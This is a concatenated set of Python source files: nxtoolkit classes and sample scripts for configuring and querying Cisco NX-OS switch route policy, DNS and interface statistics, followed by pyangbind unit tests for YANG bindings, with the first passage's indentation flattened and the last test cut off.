att=g_child['rtmapMatchRtDstV6']['children']
for gg_child in att:
name=gg_child['rtmapRsRtDstV6Att'][
'attributes']
map.match_pfxlistv6(str(name['tDn'][18:]))
elif g_child.get('rtmapMatchRtDst'):
att=g_child['rtmapMatchRtDst']['children']
for gg_child in att:
name=gg_child['rtmapRsRtDstAtt'][
'attributes']
map.match_pfxlistv4(str(name['tDn'][18:]))
elif g_child.get('rtmapMatchRegComm'):
att=g_child['rtmapMatchRegComm']['children']
for gg_child in att:
name=gg_child['rtmapRsRegCommAtt'][
'attributes']
map.match_comm(str(name['tDn'][17:]))
elif g_child.get('rtmapMatchAsPathAccessList'):
att=g_child['rtmapMatchAsPathAccessList'][
'children']
for gg_child in att:
name=gg_child['rtmapRsRtAsPathAccAtt'][
'attributes']
map.match_as_path(str(name['tDn'][19:]))
elif g_child.get('rtmapSetNh'):
att=g_child['rtmapSetNh']['attributes']
map.set_next_hop(str(att['addr']))
elif g_child.get('rtmapSetCommList'):
att=g_child['rtmapSetCommList']['attributes']
map.set_comm_list(str(att['name']), 'delete')
elif g_child.get('rtmapMatchRtType'):
att=g_child['rtmapMatchRtType']['attributes']
map.match_rt_type(str(att['routeT']))
elif g_child.get('rtmapMatchRtTag'):
att=g_child['rtmapMatchRtTag']['attributes']
map.match_rt_tag(str(att['tag']))
elif g_child.get('rtmapSetPref'):
att=g_child['rtmapSetPref']['attributes']
map.set_local_pref(str(att['localPref']))
elif g_child.get('rtmapSetOrigin'):
att=g_child['rtmapSetOrigin']['attributes']
map.set_origin(str(att['originT']))
rt_map.add(map)
return rt_map
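# Hypothetical usage sketch: a RouteMap with one RouteMapEntry using the
# classes above; sequence number, tag and local-preference are assumed values.
def _example_build_route_map():
    """Sketch: one permit entry matching a tag and setting local-preference."""
    rt_map = RouteMap('RM-EXAMPLE')
    entry = RouteMapEntry(action='permit', seq_no='10')
    entry.set_descr('example entry')
    entry.match_rt_tag('100')
    entry.set_local_pref('200')
    rt_map.add(entry)
    return rt_map.get_url(), rt_map.get_json()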
class RtPrefix(BaseNXObject):
"""
This class defines Prefix address configuration
"""
def __init__(self, address, action='permit', seq_no='5', session=None,
parent=None):
super(RtPrefix, self).__init__(name='')
self._session= session
self._parent = parent
self.pfx_obj = 'rtpfxEntry'
self.pfx_addr = address
self.action = action
self.seq_no = seq_no
def _get_attributes(self):
att = {}
att['action'] = self.action
att['pfx'] = self.pfx_addr
att['order'] = self.seq_no
return att
def get_url(self):
""" Return Prefix address url """
return '/api/node/mo/'+ self.pfx_addr + '.json'
def get_json(self):
return super(RtPrefix, self).get_json(obj_class=self.pfx_obj,
attributes=self._get_attributes())
class PrefixList(BaseNXObject):
"""
This class defines Prefix list configuration
"""
def __init__(self, name, version='v4', session=None, parent=None):
super(PrefixList, self).__init__(name)
self._session= session
self._parent = parent
if version == 'v4':
self.pfx_list_obj = 'rtpfxRuleV4'
elif version == 'v6':
self.pfx_list_obj = 'rtpfxRuleV6'
else:
raise TypeError("Provide proper version")
self.name = name
self.prefix_list = []
def set_prefix(self, pfx_addr, action=None, seq_no=None):
pfx = RtPrefix(pfx_addr, action, seq_no)
self._children.append(pfx)
self.prefix_list.append(pfx)
def _get_attributes(self):
att = {}
att['name'] = self.name
return att
def get_url(self):
""" Return Prefix list url """
if self.pfx_list_obj == 'rtpfxRuleV6':
return '/api/node/mo/sys/rpm/pfxlistv6-' + self.name + '.json'
else:
return '/api/node/mo/sys/rpm/pfxlistv4-' + self.name + '.json'
def get_json(self):
return super(PrefixList, self).get_json(obj_class=self.pfx_list_obj,
attributes=self._get_attributes())
@classmethod
def get(cls, session, name, version='v4'):
"""
:param session: Session object to communicate with Switch
:return PrefixList object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if version == 'v4':
prefix_obj = 'rtpfxRuleV4'
query_url = ('/api/node/mo/sys/rpm/pfxlistv4-' + name +
'.json?rsp-' + 'subtree=full')
elif version == 'v6':
prefix_obj = 'rtpfxRuleV6'
query_url = ('/api/node/mo/sys/rpm/pfxlistv6-' + name +
'.json?rsp-' + 'subtree=full')
else:
            raise TypeError('Provide proper version')
resp = session.get(query_url).json()['imdata']
for ret in resp:
prefix = PrefixList((str(ret[prefix_obj]['attributes']
['name'])), version)
if ret[prefix_obj].get('children'):
for child in ret[prefix_obj]['children']:
pfx_att = child['rtpfxEntry']['attributes']
prefix.set_prefix(str(pfx_att['pfx']),
str(pfx_att['action']),
str(pfx_att['order']))
return prefix
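# Hypothetical usage sketch: a v4 prefix-list built with PrefixList/RtPrefix
# as defined above; the list name, prefix and sequence number are assumed.
def _example_build_prefix_list():
    """Sketch: a prefix-list with a single permit entry."""
    pfx_list = PrefixList('PL-EXAMPLE', version='v4')
    pfx_list.set_prefix('192.0.2.0/24', action='permit', seq_no='5')
    return pfx_list.get_url(), pfx_list.get_json()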
class AccessList(BaseNXObject):
"""
This class defines access list configuration
"""
def __init__(self, name, action, regex, seq_no=None, session=None,
parent=None):
super(AccessList, self).__init__(name)
self._session= session
self._parent = parent
self.acc_list_obj = 'rtlistEntry'
self.name = name
self.action = action
self.regex = regex
self.seq_no = seq_no
def _get_attributes(self):
att = {}
att['action'] = self.action
att['regex'] = self.regex
if self.seq_no:
att['order'] = self.seq_no
else:
att['order'] = '1'
return att
def get_url(self):
""" Return access list url """
return ('/api/node/mo/sys/rpm/accesslist-'+ self.name + '/ent-' +
self.seq_no + '.json')
def get_json(self):
return super(AccessList, self).get_json(obj_class=self.acc_list_obj,
attributes=self._get_attributes())
class AsPath(BaseNXObject):
"""
This class defines As Path configuration
"""
def __init__(self, name, session=None, parent=None):
super(AsPath, self).__init__(name)
self._session= session
self._parent = parent
self.as_path_obj = 'rtlistRule'
self.name = name
self.access_lists = []
def set_access_list(self, action, regex, seq_no=None):
access = AccessList(self.name, action, regex, seq_no)
self._children.append(access)
self.access_lists.append(access)
def _get_attributes(self):
att = {}
att['name'] = self.name
return att
def get_url(self):
""" Return As Path url """
return '/api/node/mo/sys/rpm/accesslist-' + self.name + '.json'
def get_json(self):
return super(AsPath, self).get_json(obj_class=self.as_path_obj,
attributes=self._get_attributes())
@classmethod
def get(cls, session, name):
"""
:param session: Session object to communicate with Switch
:return As path object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
as_path_obj = 'rtlistRule'
query_url = ('/api/node/mo/sys/rpm/accesslist-' + name + '.json?rsp-'
+ 'subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
as_path = AsPath(str(ret[as_path_obj]['attributes']['name']))
if ret[as_path_obj].get('children'):
for child in ret[as_path_obj]['children']:
list_att = child['rtlistEntry']['attributes']
as_path.set_access_list((str(list_att['action'])),
(str(list_att['regex'])),
(str(list_att['order'])))
return as_path
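# Hypothetical usage sketch: an as-path access-list built with AsPath and
# AccessList as defined above; the name, regex and sequence number are assumed.
def _example_build_as_path_list():
    """Sketch: an as-path access-list with one permit rule."""
    as_path = AsPath('AL-EXAMPLE')
    as_path.set_access_list('permit', '^65001_', seq_no='1')
    return as_path.get_url(), as_path.get_json()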
class CommunityItem(BaseNXObject):
"""
This class defines community item configuration
"""
def __init__(self, community, session=None, parent=None):
super(CommunityItem, self).__init__(name='')
self._session= session
self._parent = parent
self.comm_obj = 'rtregcomItem'
if community == 'internet':
self.community = '0:0'
elif community == 'local-AS':
self.community = '65535:65283'
elif community == 'no-advertise':
self.community = '65535:65282'
elif community == 'no-export':
self.community = '65535:65281'
else:
self.community = community
def _get_attributes(self):
att = {}
att['community'] = 'regular:as2-nn2:' + self.community
return att
def get_url(self):
""" Return set community url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/sregcomm/item-regular:as2-nn2:' +
self.community +'.json')
def get_json(self):
return super(CommunityItem, self).get_json(obj_class=self.comm_obj,
attributes=self._get_attributes())
class CommunityEntry(BaseNXObject):
"""
This class defines community-entry configuration
"""
def __init__(self, action, community, seq_no='1', session=None,
parent=None):
super(CommunityEntry, self).__init__(name='')
self._session= session
self._parent = parent
self.comm_obj = 'rtregcomEntry'
self.action = action
self.seq_no = seq_no
self.comm_items = []
community = community.split(',')
self.add(community)
def add(self, community):
for comm in community:
com_item = CommunityItem(comm)
self._children.append(com_item)
self.comm_items.append(com_item)
def _get_attributes(self):
att = {}
att['action'] = self.action
att['order'] = self.seq_no
return att
def get_url(self):
""" Return community-entry url """
return ('/api/node/mo/sys/rpm/rtregcom-' + self.name + '.json')
def get_json(self):
return super(CommunityEntry, self).get_json(obj_class=self.comm_obj,
attributes=self._get_attributes())
class CommunityList(BaseNXObject):
"""
This class defines community-list configuration
"""
def __init__(self, name, mode, session=None, parent=None):
super(CommunityList, self).__init__(name)
self._session= session
self._parent = parent
self.comm_obj = 'rtregcomRule'
self.name = name
self.mode = mode
self.comm_entries = []
def add(self, comm_entry_obj):
self._children.append(comm_entry_obj)
self.comm_entries.append(comm_entry_obj)
def _get_attributes(self):
att = {}
att['name'] = self.name
att['mode'] = self.mode
return att
def get_url(self):
""" Return community-list url """
return ('/api/node/mo/sys/rpm/rtregcom-' + self.name + '.json')
def get_json(self):
return super(CommunityList, self).get_json(obj_class=self.comm_obj,
attributes=self._get_attributes())
@classmethod
def get(cls, session, name):
"""
:param session: Session object to communicate with Switch
        :return CommunityList object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
comm_obj = 'rtregcomRule'
query_url = ('/api/node/mo/sys/rpm/rtregcom-' + name + '.json?rsp-'
+ 'subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
com_list = CommunityList(str(ret[comm_obj]['attributes']['name']),
str(ret[comm_obj]['attributes']['mode']))
if ret[comm_obj].get('children'):
for child in ret[comm_obj]['children']:
att = child['rtregcomEntry']['attributes']
g_child = child['rtregcomEntry']['children']
community = []
for item in g_child:
comm = item['rtregcomItem']['attributes']['community']
community.append(comm[16:])
entry=CommunityEntry(str(att['action']),
','.join(community),
str(att['order']))
com_list.add(entry)
return com_list
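# Hypothetical usage sketch: a community-list built with CommunityList and
# CommunityEntry as defined above; the list name, mode and community values
# are assumptions made for illustration.
def _example_build_community_list():
    """Sketch: a community-list with one permit entry."""
    comm_list = CommunityList('CL-EXAMPLE', 'standard')
    entry = CommunityEntry('permit', 'no-export,65000:100', seq_no='1')
    comm_list.add(entry)
    return comm_list.get_url(), comm_list.get_json()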
class RPM(BaseNXObject):
"""
This class defines Route Processor Module configuration
"""
def __init__(self, session=None, parent=None):
super(RPM, self).__init__(name='')
self._session= session
self._parent = parent
self.rpm_obj = 'rpmEntity'
def add(self, rpm_obj):
self._children.append(rpm_obj)
def get_url(self):
""" Return RPM url """
return '/api/node/mo/sys/rpm.json'
def get_json(self):
return super(RPM, self).get_json(obj_class=self.rpm_obj,
attributes={})
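# Hypothetical usage sketch: RPM is the container for the route-policy
# objects above; this nests an (empty) route-map purely for illustration.
def _example_build_rpm_config():
    """Sketch: wrap a route-map inside the RPM container."""
    rpm = RPM()
    rpm.add(RouteMap('RM-EXAMPLE'))
    return rpm.get_url(), rpm.get_json()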
```
#### File: nxtoolkit/samples/nx-show-dns.py
```python
import sys
import nxtoolkit.nxtoolkit as NX
def main():
"""
Main execution routine
:return: None
"""
# Take login credentials from the command line if provided
# Otherwise, take them from your environment variables file ~/.profile
description = '''Simple application that logs on to the
Switch and displays the DNS details.'''
creds = NX.Credentials('switch', description)
args = creds.get()
# Login to Switch
session = NX.Session(args.url, args.login, args.password)
resp = session.login()
if not resp.ok:
print('%% Could not login to Switch')
sys.exit(0)
dns = NX.DNS.get(session)
print "Dns lookup state:", dns.get_admin_st()
for prof in dns.profiles:
print "\nDns profile name:", prof.name
for provider in prof.providers:
print "\tProvider ip:", provider.address
for domain in prof.domains:
print "\tDomain name:", domain.name
for domain_ext in prof.domain_exts:
print "\tDomain list name:", domain_ext.name
for host in prof.hosts:
print "\tHost name:%s\t\tAddress:%s"% (host.name, host.address)
for vrf in prof.vrfs:
for provider in vrf.providers:
print "\tVrf name:%s\tProvider ip:%s"% (vrf.name,
provider.address)
for domain in vrf.domains:
print "\tVrf name:%s\tDomain name:%s"% (vrf.name,
domain.name)
for domain_ext in vrf.domain_exts:
print "\tVrf name:%s\tDomain list name:%s"% (vrf.name,
domain_ext.name)
if __name__ == '__main__':
main()
```
#### File: nxtoolkit/samples/nx-show-interface-stats.py
```python
from operator import attrgetter
import sys
import nxtoolkit.nxtoolkit as NX
def show_stats_short(args, interfaces):
"""
show stats short routine
:param args: command line arguments
:param interfaces: list of interfaces
:return: None
"""
# setup template and display header information
template = "{0:16} {1:16} {2:16} {3:16} {4:16} {5:16}"
print(template.format(" INTERFACE ", "Status", "RX BYTES/Sec",
"TX BYTES/Sec", "RX PKTs/Sec","TX PKTs/Sec"))
print(template.format("--------------", "------------ ", "------------ ",
"---------------", "---------------",
"---------------"))
template = "{0:16} {1:16} {2:16,.2f} {3:16,.2f} {4:16,.2f} {5:16,.2f}"
for interface in sorted(interfaces, key=attrgetter('if_name')):
interface.stats.get()
rec = []
allzero = True
for (counter_family, count_name) in [('rmonIfIn', 'octetRate'),
('rmonIfOut', 'octetRate'),
('rmonIfIn', 'packetRate'),
('rmonIfOut', 'packetRate')]:
rec.append(interface.stats.retrieve(counter_family, count_name))
if interface.stats.retrieve(counter_family, count_name) != 0:
allzero = False
if (args.nonzero and not allzero) or not args.nonzero:
print(template.format(interface.name, interface.operSt, *rec))
def show_stats_long(args, interfaces):
"""
show stats long routine
:param args: command line arguments
:param interfaces: list of interfaces
:return: None
"""
print('Interface {0}/{1}'.format(interfaces[0].module,interfaces[0].port))
stats = interfaces[0].stats.get()
for stats_family in sorted(stats):
        print(stats_family)
for counter in sorted(stats[stats_family]):
print(' {0:>25}: {1}'.format(counter,
stats[stats_family][counter]))
def main():
"""
Main execution routine
:return: None
"""
# Take login credentials from the command line if provided
# Otherwise, take them from your environment variables file ~/.profile
description = '''Simple application that logs on to the Switch and
displays stats for all of the Interfaces.'''
creds = NX.Credentials('switch', description)
creds.add_argument('-i', '--interface',
type=str,
help='Specify a particular interface module/port e.g. 1/21')
creds.add_argument('-f', '--full', action="store_true",
help='''Show full statistics - only available
if interface is specified''')
creds.add_argument('-n', '--nonzero', action='store_true',
help='''Show only interfaces where the counters are not zero.
- only available if interface is NOT specified''')
args = creds.get()
# Login to switch
session = NX.Session(args.url, args.login, args.password)
resp = session.login()
if not resp.ok:
print('%% Could not login to Switch')
sys.exit(0)
# Download all of the interfaces and get their stats
# and display the stats
if args.interface:
interface = args.interface
if 'eth ' in interface:
interface = interface[4:]
#(module, port) = interface.split('/')
#interfaces = NX.Interface.get(session, module, port)
interfaces = NX.Interface.get(session, 'eth'+interface)
else:
interfaces = NX.Interface.get(session)
if not args.full or not args.interface:
show_stats_short(args, interfaces)
else:
show_stats_long(args, interfaces)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
``` |
{
"source": "jonnyrocks/pyangbind",
"score": 2
} |
#### File: tests/config-false/run.py
```python
import unittest
from tests.base import PyangBindTestCase
class ConfigFalseTests(PyangBindTestCase):
yang_files = ["config-false.yang"]
def setUp(self):
self.test_instance = self.bindings.config_false()
def test_container_is_configurable_by_default(self):
self.assertTrue(self.test_instance.container._is_config)
def test_set_configurable_leaf_with_non_configurable_sibling(self):
allowed = True
try:
self.test_instance.container.subone.a_leaf = 1
except AttributeError:
allowed = False
self.assertTrue(allowed)
def test_leaf_is_configurable_by_default(self):
self.assertTrue(self.test_instance.container.subone.a_leaf._is_config)
def test_set_non_configurable_leaf(self):
allowed = True
try:
self.test_instance.container.subone.d_leaf = 1
except AttributeError:
allowed = False
self.assertFalse(allowed)
def test_leaf_reports_not_configurable_with_config_false(self):
self.assertFalse(self.test_instance.container.subone.d_leaf._is_config)
def test_set_leaf_in_non_configurable_container(self):
allowed = True
try:
self.test_instance.container.subtwo.b_leaf = 1
except AttributeError:
allowed = False
self.assertFalse(allowed)
def test_leaf_in_non_configurable_container_reports_not_configurable(self):
self.assertFalse(self.test_instance.container.subtwo.b_leaf._is_config)
def test_set_leaf_in_sub_container_of_non_configurable_container(self):
allowed = True
try:
self.test_instance.container.subtwo.subsubtwo.c_leaf = 1
except AttributeError:
allowed = False
self.assertFalse(allowed)
def test_leaf_in_sub_container_of_non_configurable_container_reports_not_configurable(self):
self.assertFalse(self.test_instance.container.subtwo.subsubtwo.c_leaf._is_config)
if __name__ == "__main__":
unittest.main()
```
#### File: tests/leaf-list/run.py
```python
from __future__ import unicode_literals
from tests.base import PyangBindTestCase
try:
import unittest2 as unittest
except ImportError:
import unittest
class LeafListTests(PyangBindTestCase):
yang_files = ["leaflist.yang"]
def setUp(self):
self.leaflist_obj = self.bindings.leaflist()
def test_container_exists(self):
self.assertTrue(hasattr(self.leaflist_obj, "container"))
def test_leaflist_exists(self):
self.assertTrue(hasattr(self.leaflist_obj.container, "leaflist"))
def test_leaflist_length_is_zero(self):
self.assertEqual(len(self.leaflist_obj.container.leaflist), 0)
def test_append_to_leaflist(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.assertEqual(len(self.leaflist_obj.container.leaflist), 1)
def test_retrieve_leaflist_item_value(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.assertEqual(self.leaflist_obj.container.leaflist[0], "itemOne")
def test_append_int_to_string_leaflist(self):
with self.assertRaises(ValueError):
self.leaflist_obj.container.leaflist.append(1)
def test_getitem(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.leaflist_obj.container.leaflist.append("itemTwo")
self.assertEqual(self.leaflist_obj.container.leaflist[1], "itemTwo")
def test_setitem(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.leaflist_obj.container.leaflist.append("itemTwo")
self.leaflist_obj.container.leaflist[1] = "indexOne"
self.assertEqual(self.leaflist_obj.container.leaflist[1], "indexOne")
def test_insert(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.leaflist_obj.container.leaflist.append("itemTwo")
self.leaflist_obj.container.leaflist[1] = "indexOne"
self.leaflist_obj.container.leaflist.insert(0, "indexZero")
self.assertEqual(self.leaflist_obj.container.leaflist[0], "indexZero")
def test_leaflist_grows_from_various_modification_methods(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.leaflist_obj.container.leaflist.append("itemTwo")
self.leaflist_obj.container.leaflist[1] = "indexOne"
self.leaflist_obj.container.leaflist.insert(0, "indexZero")
self.assertEqual(len(self.leaflist_obj.container.leaflist), 4)
def test_delete_item_from_leaflist(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.leaflist_obj.container.leaflist.append("itemTwo")
self.leaflist_obj.container.leaflist[1] = "indexOne"
self.leaflist_obj.container.leaflist.insert(0, "indexZero")
del self.leaflist_obj.container.leaflist[0]
self.assertEqual(len(self.leaflist_obj.container.leaflist), 3)
def test_get_full_leaflist(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.leaflist_obj.container.leaflist.append("itemTwo")
self.leaflist_obj.container.leaflist[1] = "indexOne"
self.leaflist_obj.container.leaflist.insert(0, "indexZero")
del self.leaflist_obj.container.leaflist[0]
self.assertEqual(
self.leaflist_obj.get(),
{"container": {"leaflist": ["itemOne", "indexOne", "itemTwo"], "listtwo": [], "listthree": []}},
)
def test_leaflist_assignment(self):
self.leaflist_obj.container.leaflist = ["itemOne", "itemTwo"]
self.assertEqual(self.leaflist_obj.container.leaflist, ["itemOne", "itemTwo"])
def test_leaflist_assignment_of_wrong_type(self):
with self.assertRaises(ValueError):
self.leaflist_obj.container.leaflist = [1, 2]
def test_restricted_string(self):
self.leaflist_obj.container.listtwo.append("a-valid-string")
self.assertEqual(len(self.leaflist_obj.container.listtwo), 1)
def test_restricted_string_invalid_value(self):
with self.assertRaises(ValueError):
self.leaflist_obj.container.listtwo.append("broken-string")
def test_union_type(self):
for pair in [(1, True), ("fish", True), ([], False)]:
with self.subTest(pair=pair):
allowed = True
try:
self.leaflist_obj.container.listthree.append(pair[0])
except ValueError:
allowed = False
self.assertEqual(allowed, pair[1])
def test_leaf_lists_are_unique_after_assignment(self):
self.leaflist_obj.container.leaflist = ["foo", "bar", "foo"]
self.assertEqual(self.leaflist_obj.container.get(filter=True), {"leaflist": ["foo", "bar"]})
def test_leaf_lists_are_unique_after_append(self):
self.leaflist_obj.container.leaflist.append("foo")
self.leaflist_obj.container.leaflist.append("bar")
self.leaflist_obj.container.leaflist.append("foo")
self.assertEqual(self.leaflist_obj.container.get(filter=True), {"leaflist": ["foo", "bar"]})
    def test_leaf_lists_insert_non_unique_value_raises_valueerror(self):
self.leaflist_obj.container.leaflist[0] = "foo"
self.leaflist_obj.container.leaflist[1] = "bar"
with self.assertRaises(ValueError):
self.leaflist_obj.container.leaflist[2] = "foo"
if __name__ == "__main__":
unittest.main()
```
#### File: serialise/json-serialise/run.py
```python
import json
import os.path
import unittest
from decimal import Decimal
import six
from bitarray import bitarray
from pyangbind.lib.pybindJSON import dumps
from pyangbind.lib.xpathhelper import YANGPathHelper
from tests.base import PyangBindTestCase
class JSONSerialiseTests(PyangBindTestCase):
yang_files = ["json-serialise.yang"]
pyang_flags = ["--use-xpathhelper"]
def setUp(self):
self.yang_helper = YANGPathHelper()
self.serialise_obj = self.bindings.json_serialise(path_helper=self.yang_helper)
def test_serialise_container(self):
self.serialise_obj.two.string_test = "twenty-two"
with open(os.path.join(os.path.dirname(__file__), "json", "container.json"), "r") as fp:
self.assertEqual(
json.loads(dumps(self.yang_helper.get("/two")[0])),
json.load(fp),
"Invalid output returned when serialising a container.",
)
def test_full_serialise(self):
self.serialise_obj.c1.l1.add(1)
for signed in ["int", "uint"]:
for size in [8, 16, 32, 64]:
name = "%s%s" % (signed, size)
setter = getattr(self.serialise_obj.c1.l1[1], "_set_%s" % name)
setter(1)
self.serialise_obj.c1.l1[1].restricted_integer = 6
self.serialise_obj.c1.l1[1].string = "bear"
self.serialise_obj.c1.l1[1].restricted_string = "aardvark"
self.serialise_obj.c1.l1[1].union = 16
self.serialise_obj.c1.l1[1].union_list.append(16)
self.serialise_obj.c1.l1[1].union_list.append("chicken")
self.serialise_obj.c1.t1.add(16)
self.serialise_obj.c1.t1.add(32)
self.serialise_obj.c1.l1[1].leafref = 16
self.serialise_obj.c1.l1[1].binary = bitarray("010101")
self.serialise_obj.c1.l1[1].boolean = True
self.serialise_obj.c1.l1[1].enumeration = "one"
self.serialise_obj.c1.l1[1].identityref = "idone"
self.serialise_obj.c1.l1[1].typedef_one = "test"
self.serialise_obj.c1.l1[1].typedef_two = 8
self.serialise_obj.c1.l1[1].one_leaf = "hi"
for i in range(1, 5):
self.serialise_obj.c1.l1[1].ll.append(six.text_type(i))
self.serialise_obj.c1.l1[1].next_hop.append("DROP")
self.serialise_obj.c1.l1[1].next_hop.append("192.0.2.1")
self.serialise_obj.c1.l1[1].next_hop.append("fish")
self.serialise_obj.c1.l1[1].typedef_decimal = Decimal("21.21")
self.serialise_obj.c1.l1[1].range_decimal = Decimal("4.44443322")
self.serialise_obj.c1.l1[1].typedef_decimalrange = Decimal("42.42")
self.serialise_obj.c1.l1[1].decleaf = Decimal("42.4422")
for i in range(1, 10):
self.serialise_obj.c1.l2.add(i)
pybind_json = json.loads(dumps(self.serialise_obj))
with open(os.path.join(os.path.dirname(__file__), "json", "expected-output.json"), "r") as fp:
external_json = json.load(fp)
self.assertEqual(pybind_json, external_json, "JSON did not match expected output.")
if __name__ == "__main__":
unittest.main()
```
#### File: tests/serialise/xml_utils.py
```python
def xml_tree_equivalence(e1, e2):
"""
Rough XML comparison function based on https://stackoverflow.com/a/24349916/1294458.
    This is necessary to provide some sort of structural equivalence for a generated XML
    tree; however, there is no XML deserialisation implementation yet. A naive text comparison
    fails because it enforces element ordering, which seems to vary between Python versions.
    Strictly speaking, only the *leaf-list* elements mandate ordering, so this function uses
    simple sorting on tag name, which should maintain the relative order of those elements.
"""
if e1.tag != e2.tag:
return False
if e1.text != e2.text:
return False
if e1.tail != e2.tail:
return False
if e1.attrib != e2.attrib:
return False
if len(e1) != len(e2):
return False
    e1_children = sorted(e1, key=lambda x: x.tag)
    e2_children = sorted(e2, key=lambda x: x.tag)
if len(e1_children) != len(e2_children):
return False
return all(xml_tree_equivalence(c1, c2) for c1, c2 in zip(e1_children, e2_children))
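# Hypothetical usage sketch: demonstrates the order-insensitive comparison
# described in the docstring above; the two documents differ only in the
# order of their children.
def _example_xml_tree_equivalence():
    from xml.etree import ElementTree as ET
    doc_a = ET.fromstring("<root><a>1</a><b>2</b></root>")
    doc_b = ET.fromstring("<root><b>2</b><a>1</a></root>")
    # Expected to compare as equivalent under this rough comparison.
    return xml_tree_equivalence(doc_a, doc_b)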
```
#### File: tests/strings/run.py
```python
from __future__ import unicode_literals
import unittest
from tests.base import PyangBindTestCase
class StringTests(PyangBindTestCase):
yang_files = ["string.yang"]
def setUp(self):
self.instance = self.bindings.string()
def test_string_leaf_is_not_changed_by_default(self):
self.assertFalse(self.instance.string_container.string_leaf._changed())
def test_set_basic_string_value_on_string_leaf(self):
self.instance.string_container.string_leaf = "TestValue"
self.assertEqual(self.instance.string_container.string_leaf, "TestValue")
def test_integer_gets_cast_to_string(self):
self.instance.string_container.string_leaf = 1
self.assertEqual(self.instance.string_container.string_leaf, "1")
def test_string_leaf_gets_marked_as_changed(self):
self.instance.string_container.string_leaf = "TestValue"
self.assertTrue(self.instance.string_container.string_leaf._changed())
def test_concatenation_to_string_leaf(self):
self.instance.string_container.string_leaf = "TestValue"
self.instance.string_container.string_leaf += "Addition"
self.assertEqual(self.instance.string_container.string_leaf, "TestValueAddition")
def test_string_leaf_with_default_is_blank(self):
self.assertEqual(self.instance.string_container.string_default_leaf, "")
def test_string_leaf_with_default_has_correct_default_value_hidden(self):
self.assertEqual(self.instance.string_container.string_default_leaf._default, "string")
def test_string_leaf_with_default_and_pattern_has_correct_default_value_hidden(self):
self.assertEqual(self.instance.string_container.restricted_string_default._default, "beep")
def test_set_valid_value_on_restricted_string(self):
allowed = True
try:
self.instance.string_container.restricted_string = "aardvark"
except ValueError:
allowed = False
self.assertTrue(allowed)
def test_set_invalid_value_on_restricted_string(self):
with self.assertRaises(ValueError):
self.instance.string_container.restricted_string = "bear"
def test_fixed_length_string(self):
for (value, valid) in [("a", False), ("ab", True), ("abc", False)]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.restricted_length_string = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
def test_fixed_length_string_with_pattern(self):
for (value, valid) in [("a", False), ("ba", False), ("abc", False), ("ab", True)]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.restricted_length_and_pattern_string = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
def test_string_with_length_as_range_with_max(self):
for (value, valid) in [("short", False), ("loooooooong", True)]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.restricted_length_string_with_range = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
def test_string_with_length_as_range_with_upper_bound(self):
for (value, valid) in [("short", False), ("loooooooong", True), ("toooooooooolooooooooong", False)]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.restricted_length_string_range_two = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
def test_string_leaf_with_complex_length(self):
for (value, valid) in [
("strLength10", True),
("LengthTwelve", True),
("strTwentyOneCharsLong", False),
("aReallyLongStringMoreThan30CharsLong", True),
("anEvenLongerStringThatIsMoreThanFortyChars", False),
]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.stringLeafWithComplexLength = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
def test_string_leaf_pattern_with_dollar(self):
for (value, valid) in [("fi$h", True), ("void", False), ("fi$ho", True)]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.stringLeafWithPatternWithDollar = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
def test_string_leaf_pattern_with_dollar_at_end(self):
for (value, valid) in [("fi$h", True), ("void", False), ("fi$ho", False)]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.dollarAtEnd = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
if __name__ == "__main__":
unittest.main()
```
#### File: xpath/04-root/run.py
```python
import json
import os
import unittest
import pyangbind.lib.pybindJSON as pbJ
from pyangbind.lib.serialise import pybindJSONDecoder
from pyangbind.lib.xpathhelper import YANGPathHelper
from pyangbind.lib.yangtypes import safe_name
from tests.base import PyangBindTestCase
class XPathRootTests(PyangBindTestCase):
yang_files = ["root-tc04-a.yang", "root-tc04-b.yang"]
pyang_flags = ["--use-extmethods", "--use-xpathhelper"]
def setUp(self):
self.path_helper = YANGPathHelper()
self.instance_a = self.bindings.root_tc04_a(path_helper=self.path_helper)
self.instance_b = self.bindings.root_tc04_b(path_helper=self.path_helper)
def test_001_check_containers(self):
self.assertIsNot(getattr(self.instance_a, safe_name("root-tc04-a"), None), None)
self.assertIsNot(getattr(self.instance_b, safe_name("root-tc04-b"), None), None)
def test_002_base_gets(self):
        # each of these raises an exception on failure, so any error here fails the test case
self.path_helper.get_unique("/")
self.path_helper.get_unique("/root-tc04-a")
self.path_helper.get_unique("/root-tc04-b")
def test_003_base_sets(self):
a = self.path_helper.get_unique("/root-tc04-a")
a.a = "little-cottonwood"
self.assertEqual(self.instance_a.root_tc04_a.a, "little-cottonwood")
b = self.path_helper.get_unique("/root-tc04-b")
b.b = "big-cottonwood"
self.assertEqual(self.instance_b.root_tc04_b.b, "big-cottonwood")
def test_004_serialise(self):
self.instance_a.root_tc04_a.a = "emigration"
self.instance_b.root_tc04_b.b = "alpine-fork"
with open(os.path.join(os.path.dirname(__file__), "json", "04-serialise.json")) as fp:
